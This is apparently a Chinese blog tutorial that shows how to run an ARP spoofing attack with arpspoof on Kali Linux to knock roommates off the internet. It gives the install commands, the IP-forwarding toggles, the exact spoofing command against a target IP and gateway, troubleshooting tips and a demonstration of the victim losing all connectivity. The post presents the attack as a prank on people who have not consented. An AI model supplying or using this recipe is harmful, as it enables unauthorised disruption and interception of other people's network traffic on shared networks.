前言:
舍友打游戏、放抖音太吵了?是时候给他们点教训了,让他们感受到什么叫原始生活。(滑稽)
实施一个简单的ARP欺骗,实现断网操作。
Arp欺骗:
Arpspoof安装:在kali终端输入:apt-get install dsniff ssldump
检查是否安装好:arpspoof
特殊情况--kali更好镜像源:
vim /etc/apt/sources.list进入vim编辑模式,复制下列的镜像源
# deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
# deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
输入(:wq)保存退出vim编辑模式
apt-get update # 更新软件列表,必须先操作
apt-get upgrade #正在更新软件
# 或者 apt dist-upgrade 一种不安全的升级,有可能有依赖导致软件错误.少用
Arpspoof的使用:
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host//基本命令格式
echo 1 >/proc/sys/net/ipv4/ip_forward #开启端口转发
cat /proc/sys/net/ipv4/ip_forward #检测端口是否开启(1为开启 0为关闭)
echo 0 >/proc/sys/net/ipv4/ip_forward #关闭端口转发
arpspoof -i eth0 -t <攻击的IP> <网关>
注意事项:
1、网卡不对,一般来说默认的网卡就是eth0,也有可能是其它的,具体需要查看了才知道。
2、IP不存在或者IP地址错误,这里主要说的是192.168.1.104,有可能你的物理电脑局域网IP不是这个。
3、不同局域网内的IP之间不能进行ARP欺骗,这个是非常重要的。
4、IP不在同一网段,arpspoof此命令必须要保证IP都是同一网段的。如果网络配置有问题可以看看我的另一篇讲KALI网络配置的:
KALI-LINUX桥接模式下网络配置(学习笔记)_aarong的博客-CSDN博客
5、如果网络用的是WLAN的话,IP地址是会变化的!!!!
看看被攻击者的网络是否正常(断网操作!!!)
实践操作
在一台主机上用浏览器打开百度:
在kali上伪造网关(当然这是要通过信息收集得到的主机网关,我这里只做演示):
在另一台主机上查看效果:
无论打开什么网页都无法连接了 ,实验结束。